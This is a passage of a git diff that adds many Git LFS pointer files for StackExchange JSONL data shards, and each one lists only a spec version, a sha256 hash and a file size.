b/data/stackexchange/1-1/1789_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..c17e07945c1c631ce5eb272b28cb293f417de5c6 --- /dev/null +++ b/data/stackexchange/1-1/1789_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a7bfc8c5b0a9c5666cf22dc6d4ec0d4db19e53b3fe146f2109385adc3a2ec7f +size 40369110 diff --git a/data/stackexchange/1-1/178_2289.jsonl b/data/stackexchange/1-1/178_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d7c1b517bce56b46317a44151ba33e866fac1d5 --- /dev/null +++ b/data/stackexchange/1-1/178_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53a352b2a1d1a922ae675e88b95506a567a66b7a1669a4a44f7e2d3a44a5d745 +size 35418676 diff --git a/data/stackexchange/1-1/1790_2289.jsonl b/data/stackexchange/1-1/1790_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91931c3d0ca5a6b5dd80a7739134d90d391c7a35 --- /dev/null +++ b/data/stackexchange/1-1/1790_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45d81e12eb65793ad96d9d49d20a52b2124297cf1c5617000b0a586376c74375 +size 41241497 diff --git a/data/stackexchange/1-1/1791_2289.jsonl b/data/stackexchange/1-1/1791_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18066a931bdd806e6575aa26e4a285b778d12800 --- /dev/null +++ b/data/stackexchange/1-1/1791_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebf829ac3181b01cd000ac29b263092de273c9bb20025a1166c38b1acdfcc1fa +size 40954191 diff --git a/data/stackexchange/1-1/1792_2289.jsonl b/data/stackexchange/1-1/1792_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae108245d643a684b833ee761c08f45b0f32f564 --- /dev/null +++ b/data/stackexchange/1-1/1792_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40882da1385105163400f96b157b3a9d8fc0e08f986c1cd85e1ee8186845be9b +size 40594620 diff --git a/data/stackexchange/1-1/1793_2289.jsonl b/data/stackexchange/1-1/1793_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2e1cb197aab87085b8b452ee53a5daa13dcfc40 --- /dev/null +++ b/data/stackexchange/1-1/1793_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a999af3183e9f34251ed0d3cd7d50bf9796cd9d8327a28837aa85a5bc9a2ce2a +size 41237094 diff --git a/data/stackexchange/1-1/1794_2289.jsonl b/data/stackexchange/1-1/1794_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8bc0e6e67332c49e72c57562e4340f050cb6afe3 --- /dev/null +++ b/data/stackexchange/1-1/1794_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f87a90ae2a0b628ca28e25d6cd18c032cfbfd47329792a43e71611d66d9d4d71 +size 41220284 diff --git a/data/stackexchange/1-1/1795_2289.jsonl b/data/stackexchange/1-1/1795_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..03816e60dcc61fe81d9e76ab346a0c58322b4055 --- /dev/null +++ b/data/stackexchange/1-1/1795_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12148d94176532332fab11920a1f2792f794090d31769520d7ff10fe783c5e49 +size 41345914 diff --git a/data/stackexchange/1-1/1796_2289.jsonl b/data/stackexchange/1-1/1796_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb2896a6a23dca3bb20b73a430bc0e925b8d29e2 --- /dev/null +++ b/data/stackexchange/1-1/1796_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:ed11c176fed424e337bb10b3c3a07ecc2b08b51d55629c3f841dc1e2a5d5ce80 +size 39804550 diff --git a/data/stackexchange/1-1/1797_2289.jsonl b/data/stackexchange/1-1/1797_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8dbb8485c14123fc5fb735b2ba753ef16478a810 --- /dev/null +++ b/data/stackexchange/1-1/1797_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c70a677fead0936876812bdc112a8d9dde7670db44e08a8a5da67c7417c4cab +size 40619237 diff --git a/data/stackexchange/1-1/1798_2289.jsonl b/data/stackexchange/1-1/1798_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..452a03c6965afa2c2ae491122ee2217042b93a6a --- /dev/null +++ b/data/stackexchange/1-1/1798_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a98101fb52f8022c3e04927b4c71e2fe4e2ff2eb74936bee6fc8a614abc25f8 +size 40734761 diff --git a/data/stackexchange/1-1/1799_2289.jsonl b/data/stackexchange/1-1/1799_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee20bae957b717e7945d7e70f5c4806241b7465a --- /dev/null +++ b/data/stackexchange/1-1/1799_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c43e23556b00ae4f1dc1cfc0a653df74b34821050e6b64c44ce9ca975192b667 +size 40728621 diff --git a/data/stackexchange/1-1/179_2289.jsonl b/data/stackexchange/1-1/179_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88d68b163865ce6e20a16d56f4eaab234c2f7ac5 --- /dev/null +++ b/data/stackexchange/1-1/179_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6b6db3e87532348f2d74800441815f72cf4e2253b3fb48f07efc3578c5c686f +size 35189934 diff --git a/data/stackexchange/1-1/17_2289.jsonl b/data/stackexchange/1-1/17_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c02465c11f93da3b3c8beb65252e0c9b7ecff81 --- /dev/null +++ b/data/stackexchange/1-1/17_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a19e8c0e00e42f006f5b41805e1aa9c4df929174b3443d437e5b2591eec5dd55 +size 36021243 diff --git a/data/stackexchange/1-1/1800_2289.jsonl b/data/stackexchange/1-1/1800_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..47cecadb15d66040ee1c92021343ca220395e6ff --- /dev/null +++ b/data/stackexchange/1-1/1800_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7726fdd14147e9a9646b1f5e1d34f13fbfed0268b8b576f170753b9f1b5ce592 +size 40452204 diff --git a/data/stackexchange/1-1/1801_2289.jsonl b/data/stackexchange/1-1/1801_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6e8025f8d7d32fd372704b44cf2f2a54cce1fce0 --- /dev/null +++ b/data/stackexchange/1-1/1801_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:817f223b984fb2320ef11b57325a304887a4b3b4574d942a259f86b90d722895 +size 41168285 diff --git a/data/stackexchange/1-1/1802_2289.jsonl b/data/stackexchange/1-1/1802_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4c2b66cb2be2eca2a4608ea5b6c647f6e8da20cb --- /dev/null +++ b/data/stackexchange/1-1/1802_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f37cdee88aae08d703f1e51b49fa2675ef566bc544d5d2f4d6f259aadee20b83 +size 40897372 diff --git a/data/stackexchange/1-1/1803_2289.jsonl b/data/stackexchange/1-1/1803_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..16f6776ce56a3e2326b38c491687c4f2e60afc9c --- /dev/null +++ b/data/stackexchange/1-1/1803_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:078c5d2ce18011b5dc7ec1fd1568b6bfd7f9e9ed9d21a382fa7bfbf6aa7999e8 +size 40739653 diff --git a/data/stackexchange/1-1/1804_2289.jsonl b/data/stackexchange/1-1/1804_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7a55e52b64d3f74382c86fb63d45ca4ec42ca8ae --- /dev/null +++ b/data/stackexchange/1-1/1804_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ceafdaedbbe38b4a55053497afc4aac9773140c2ba7f20d99f9b76337aea82d +size 40086027 diff --git a/data/stackexchange/1-1/1805_2289.jsonl b/data/stackexchange/1-1/1805_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b1a7750f94bc1018f3845dd115f5d49ca6b619c --- /dev/null +++ b/data/stackexchange/1-1/1805_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:521cc39034d18da57b58fae59af1e410448dcbf8c1bb3016d6a188d11ea05725 +size 41013870 diff --git a/data/stackexchange/1-1/1806_2289.jsonl b/data/stackexchange/1-1/1806_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..99cf975b4fe3dd4757561a8fe5ba697cbafcd33e --- /dev/null +++ b/data/stackexchange/1-1/1806_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2da5e9faf49bd786c225f34792088fcdc1b1dbce64594b667795c4245fc23e58 +size 40606071 diff --git a/data/stackexchange/1-1/1807_2289.jsonl b/data/stackexchange/1-1/1807_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e1e6b7c35347685afa12a1defdb8344823a67b5 --- /dev/null +++ b/data/stackexchange/1-1/1807_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f3d31b88b59c81e4594346d58bf63cbde6191d07c62dcd2e5ba9928a8ed5d62c +size 40570352 diff --git a/data/stackexchange/1-1/1808_2289.jsonl b/data/stackexchange/1-1/1808_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35461951b19672f3862c1683f5b435d077ed82ec --- /dev/null +++ b/data/stackexchange/1-1/1808_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67b5152c27785c7495315ab866efd82e934f5d31c24e6c9eefa26fde733427e4 +size 40990631 diff --git a/data/stackexchange/1-1/1809_2289.jsonl b/data/stackexchange/1-1/1809_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..758bc4163c9caf0557d62511852eac3fa1889362 --- /dev/null +++ b/data/stackexchange/1-1/1809_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e785b46c5a91e40999d42929d3b647e06cd5e0cca05825b9aea6ea517fa6ac0 +size 40917611 diff --git a/data/stackexchange/1-1/180_2289.jsonl b/data/stackexchange/1-1/180_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..71ec0ec8c94528326e7bb4a37da724a50cd1db4a --- /dev/null +++ b/data/stackexchange/1-1/180_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef4ce1483272592624f416b6257ae65a5a266e71525a158c4e3577928e55ea56 +size 35277780 diff --git a/data/stackexchange/1-1/1810_2289.jsonl b/data/stackexchange/1-1/1810_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18c2a93cea34edf7669e8a242cc6d83efd0558ce --- /dev/null +++ b/data/stackexchange/1-1/1810_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:72408cc29792d599d571428e0c6ae64a8a0969833254841571e1605c0b366dcd +size 41063247 diff --git a/data/stackexchange/1-1/1811_2289.jsonl b/data/stackexchange/1-1/1811_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..925c7d31cb0278d66b26ceaba2745c0e9569f346 --- /dev/null +++ b/data/stackexchange/1-1/1811_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11d9d9b9bbf88022a6b5f3257126615e2a26b0b506b59dde6ae57d5a8bac27dc +size 40698751 diff --git a/data/stackexchange/1-1/1812_2289.jsonl b/data/stackexchange/1-1/1812_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54e8aca3ead878aba5699b8d45b8e835e9de52ee --- /dev/null +++ b/data/stackexchange/1-1/1812_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b841e839dc3ee452baf261e1bfd52c4e6f1f20f3ab4bba78b2012f0cd2d09ad +size 41050107 diff --git a/data/stackexchange/1-1/1813_2289.jsonl b/data/stackexchange/1-1/1813_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bcc17d300aa1ca2f3253bf9c86d2029635f778a0 --- /dev/null +++ b/data/stackexchange/1-1/1813_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:985cf71011eebcebe56b239cd2728ee6372b43d091c47c68652edf11bc1f8a5d +size 42135096 diff --git a/data/stackexchange/1-1/1814_2289.jsonl b/data/stackexchange/1-1/1814_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf3f003df1e41a6ef7d5e23eecbca0ebf80645ac --- /dev/null +++ b/data/stackexchange/1-1/1814_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a0e6ffdb871adbef66fd81a9cdc2fb2d0b3b0bd49a0a5b010e69ac6f1cf8e35 +size 40141135 diff --git a/data/stackexchange/1-1/1815_2289.jsonl b/data/stackexchange/1-1/1815_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4e5071391903e5152331fc026cdc1c2239fd021 --- /dev/null +++ b/data/stackexchange/1-1/1815_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:209aed7976f563e910185b1c25281f4c8e40d24bbbf33d7958cf796861aa7b90 +size 40710064 diff --git a/data/stackexchange/1-1/1816_2289.jsonl b/data/stackexchange/1-1/1816_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0774af56f4dba8db56260ca0f71a65a2d6a278a --- /dev/null +++ b/data/stackexchange/1-1/1816_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:969c117fe6220ce9f3bd69e9402214d6e35455abd61660388f85fc89fa62bbfa +size 42030601 diff --git a/data/stackexchange/1-1/1817_2289.jsonl b/data/stackexchange/1-1/1817_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a627634677ac0bed85395dc3b3c64cbfbcc92b88 --- /dev/null +++ b/data/stackexchange/1-1/1817_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b645027ea5cb65210de0e49b6c565315a3213f59470f9c019afa7ff03ee43d2 +size 40039267 diff --git a/data/stackexchange/1-1/1818_2289.jsonl b/data/stackexchange/1-1/1818_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5be8704b902d345b8ed3f39f073b4065a3aa474c --- /dev/null +++ b/data/stackexchange/1-1/1818_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b04c33e749fa0d3a79959c875def0f6ab087b5d3bfb3c9b8aabee92c6f011dfd +size 41313440 diff --git a/data/stackexchange/1-1/1819_2289.jsonl b/data/stackexchange/1-1/1819_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..7265dd942d8ddd8eca80ed1f6df095faa3a3f162 --- /dev/null +++ b/data/stackexchange/1-1/1819_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:147eacb63ad2248df5c9cc636f71573b6e02c348b029b5411aa4d80e0b9f2ff6 +size 40291063 diff --git a/data/stackexchange/1-1/181_2289.jsonl b/data/stackexchange/1-1/181_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f9c88eda111c8ab9a22c9142e459b84f7d1473f --- /dev/null +++ b/data/stackexchange/1-1/181_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a17cbb1dcf31c203340bac2c62ecc3ba5264a1f435298fe546551f41f0d7d49b +size 35173909 diff --git a/data/stackexchange/1-1/1820_2289.jsonl b/data/stackexchange/1-1/1820_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97965a1a5097ef90e900236441742cbe188390a1 --- /dev/null +++ b/data/stackexchange/1-1/1820_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73eb441ba08fb778eb566ecac11769c1aaaa32de02f5a4b2496cdb357cfb960d +size 40960798 diff --git a/data/stackexchange/1-1/1821_2289.jsonl b/data/stackexchange/1-1/1821_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..709ae7b7691352812a02835d437270e15d084773 --- /dev/null +++ b/data/stackexchange/1-1/1821_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a96f6edc9493fe25b4cd839dcc492d15e84efb59cc8eb0544d967d19c5ee7424 +size 41194534 diff --git a/data/stackexchange/1-1/1822_2289.jsonl b/data/stackexchange/1-1/1822_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bae4b57513499993af2a74cbfe62e1f09ac02752 --- /dev/null +++ b/data/stackexchange/1-1/1822_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:febf3aaadd871a8a7da0f69f89132a4be879775d93311fe6df49d0eea11ef97e +size 40737611 diff --git a/data/stackexchange/1-1/1823_2289.jsonl b/data/stackexchange/1-1/1823_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8afdf0183487fbd1e0bbaf8a4b5ee6f4ef67b53 --- /dev/null +++ b/data/stackexchange/1-1/1823_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7494bda6ef3ebcf32c59332985ad68e3b939305b5a0be423118b1ed5e92421e +size 41542332 diff --git a/data/stackexchange/1-1/1824_2289.jsonl b/data/stackexchange/1-1/1824_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dc4ac65d3c5d7bea0313fa951ee054078fbe5a0b --- /dev/null +++ b/data/stackexchange/1-1/1824_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea7e985c203f74dc034ddb4c72a9ce3bf44dec2f7d8f396cefcd96300d2aefe6 +size 41668839 diff --git a/data/stackexchange/1-1/1825_2289.jsonl b/data/stackexchange/1-1/1825_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e4512455ea9981c5998338327ba450800781af2 --- /dev/null +++ b/data/stackexchange/1-1/1825_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:149856a9e317d2313cb0e0761753c40a281a11b6d594849c31521b19e06a29cf +size 40296430 diff --git a/data/stackexchange/1-1/1826_2289.jsonl b/data/stackexchange/1-1/1826_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ce119cfa24b6d28c57d4a726cef01f00264210b --- /dev/null +++ b/data/stackexchange/1-1/1826_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:29cb9c6884612e32472473ed56b33e9427a393bdcf317fea75aa85ce731380c9 +size 40946483 diff --git a/data/stackexchange/1-1/1827_2289.jsonl b/data/stackexchange/1-1/1827_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc7ac4dbb5e41bc26d5b0e80727a7df2bc5969a1 --- /dev/null +++ b/data/stackexchange/1-1/1827_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95e06097b83104ce24300c047d33e1547d723323ed7866f0140c65357a6274c3 +size 41605106 diff --git a/data/stackexchange/1-1/1828_2289.jsonl b/data/stackexchange/1-1/1828_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8735ecdfcc3a044703cf2c90472c6c5a00d851b1 --- /dev/null +++ b/data/stackexchange/1-1/1828_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e3493eadcbfde2ecf8ff9cdd15a1eb6e2b424c2cd63a89c8b9700509d505fbc +size 41261954 diff --git a/data/stackexchange/1-1/1829_2289.jsonl b/data/stackexchange/1-1/1829_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83f23ed7d45dfa4a39ce34d396d7e576efb81dbc --- /dev/null +++ b/data/stackexchange/1-1/1829_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50f246a80744e3d640f5843e0ee03d69eff97e994e97118ce5dac8846c54e299 +size 41320747 diff --git a/data/stackexchange/1-1/182_2289.jsonl b/data/stackexchange/1-1/182_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58d6873c149bab497d22802c2bcc325e12e2422b --- /dev/null +++ b/data/stackexchange/1-1/182_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:afd279e53652a14ca3013e5f2528971315366fc922e01a037adc02085fb5676a +size 34967450 diff --git a/data/stackexchange/1-1/1830_2289.jsonl b/data/stackexchange/1-1/1830_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35119acc4dd74eb066e90efd847a12b99f026a32 --- /dev/null +++ b/data/stackexchange/1-1/1830_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a691e3d1bffe16abc64cf678e2fedd6b6ce33f558bd84d8b48061a09e8fef0e +size 41087304 diff --git a/data/stackexchange/1-1/1831_2289.jsonl b/data/stackexchange/1-1/1831_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..470fd5a39c3c3dd3c2f9937261057d3075370ae6 --- /dev/null +++ b/data/stackexchange/1-1/1831_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae4675f008a96acc923a5e98efefaf436be5939347409f0ac70f8a959443f762 +size 40798153 diff --git a/data/stackexchange/1-1/1832_2289.jsonl b/data/stackexchange/1-1/1832_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..be4c354e534e01c590ba429ed503b9343403b512 --- /dev/null +++ b/data/stackexchange/1-1/1832_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:721e48eb04ce75c0d2a00d34d9ae86cfada43bc5ced2b14bbc4e07a1f8b4b5df +size 40628120 diff --git a/data/stackexchange/1-1/1833_2289.jsonl b/data/stackexchange/1-1/1833_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18629e2888863bf3f3be664876e07c76a4bc5349 --- /dev/null +++ b/data/stackexchange/1-1/1833_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cbb7de1fef83de5e5dd71096eca954a6359fc8e653dc2615f1c5a47b0603f9c5 +size 40813625 diff --git a/data/stackexchange/1-1/1834_2289.jsonl b/data/stackexchange/1-1/1834_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..b6f8d33b3508d0277942d92b554f624df813293a --- /dev/null +++ b/data/stackexchange/1-1/1834_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be50d54777bb435490344c4cca6b67c9976811e7c15dcac2e43ba38021ba1547 +size 41036558 diff --git a/data/stackexchange/1-1/1835_2289.jsonl b/data/stackexchange/1-1/1835_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..393b86daad66142f4b758a2404f2dc8ab1d765c3 --- /dev/null +++ b/data/stackexchange/1-1/1835_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0ccdf0c7413b93cc2970f7e971b6b2b8f92a7374014acb2e65237fd2f58c310 +size 41213705 diff --git a/data/stackexchange/1-1/1836_2289.jsonl b/data/stackexchange/1-1/1836_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0aee9fdcfdee39c45c06b94b63f74e00e46c012 --- /dev/null +++ b/data/stackexchange/1-1/1836_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:786040fdf86877ae08d546589c0e1dad1b45e5a48caaf3556897c05e61e1962c +size 41912954 diff --git a/data/stackexchange/1-1/1837_2289.jsonl b/data/stackexchange/1-1/1837_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d946b91466c2a403048861325dd6e87c5ffea1b3 --- /dev/null +++ b/data/stackexchange/1-1/1837_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:144ac42493662d9bf90e105490da179e5edb160f4461c5043dda1dd0815e3c81 +size 40300295 diff --git a/data/stackexchange/1-1/1838_2289.jsonl b/data/stackexchange/1-1/1838_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f038172ba8c532de97dd5c4e58e0da54753f1e3 --- /dev/null +++ b/data/stackexchange/1-1/1838_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66b5c560cfe4bc1fe73352af2cab8ae30148037eef9d5b167c3d8740a127f58a +size 40750815 diff --git a/data/stackexchange/1-1/1839_2289.jsonl b/data/stackexchange/1-1/1839_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9d01d635f950f02fa68f0ffe2d5980196a19a28 --- /dev/null +++ b/data/stackexchange/1-1/1839_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a17f3dcdade9a12955c4cb9ab3098e4a465dc6803ac13afe52fa8f85ad49963b +size 34621254 diff --git a/data/stackexchange/1-1/183_2289.jsonl b/data/stackexchange/1-1/183_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91073bee251d4718bd65b033be86627fb1ed7f91 --- /dev/null +++ b/data/stackexchange/1-1/183_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f974420bbd8db16cd8f8f34850751264fe04a43e98ae0db910d3a63cc2369bdb +size 34790882 diff --git a/data/stackexchange/1-1/1840_2289.jsonl b/data/stackexchange/1-1/1840_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97819ada268058c76069621bd5dbb360e1cb9783 --- /dev/null +++ b/data/stackexchange/1-1/1840_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cabe717cb0e25aa3d162215071f17da9baad307fb3e5df5276293f49d7864896 +size 34722357 diff --git a/data/stackexchange/1-1/1841_2289.jsonl b/data/stackexchange/1-1/1841_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca6affd95152fd0284ab2943ccfae23d77abeef5 --- /dev/null +++ b/data/stackexchange/1-1/1841_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:368e748c16c7eb1ad3e925c3c9adc24b88a44d15aa385f2e0c030e50f74c0b68 +size 34369500 diff --git a/data/stackexchange/1-1/1842_2289.jsonl b/data/stackexchange/1-1/1842_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3911a9adf5919c3125b1c2b28bc442bcbf1e979 --- /dev/null +++ b/data/stackexchange/1-1/1842_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9f27b8164fd0d428c8d049cbe5047bd5fd41ae3d5b2336f7cfb13a722bc92ba +size 34123655 diff --git a/data/stackexchange/1-1/1843_2289.jsonl b/data/stackexchange/1-1/1843_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9ae025f0c64303b38a028363c65e157e4f90f1c --- /dev/null +++ b/data/stackexchange/1-1/1843_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85ca8d876d100331e2fd7fba458f66e291a76c07cd8b1f4cfe6fd33622d03b43 +size 35344681 diff --git a/data/stackexchange/1-1/1844_2289.jsonl b/data/stackexchange/1-1/1844_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..054357c81eaacab913f8a43e9c000c9bed6db7a3 --- /dev/null +++ b/data/stackexchange/1-1/1844_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0617eb1a580d501969d1cbfa272da10e3a507a46aedb23b6b0ec329d56d7386f +size 33881489 diff --git a/data/stackexchange/1-1/1845_2289.jsonl b/data/stackexchange/1-1/1845_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f1d2bbe302716487c5c03ccdd898222d45d5ac7 --- /dev/null +++ b/data/stackexchange/1-1/1845_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10009fc285a461ba626357864f47c2d8e31e1e2f8978daf239049c035606a578 +size 34367579 diff --git a/data/stackexchange/1-1/1846_2289.jsonl b/data/stackexchange/1-1/1846_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe8c90ff1c9d9b6e01edf683f40f5a7f972776f7 --- /dev/null +++ b/data/stackexchange/1-1/1846_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9bace7ed208277e8262838dbfcb0dd279441d0c837b929d147a7090ce12c337 +size 34359674 diff --git 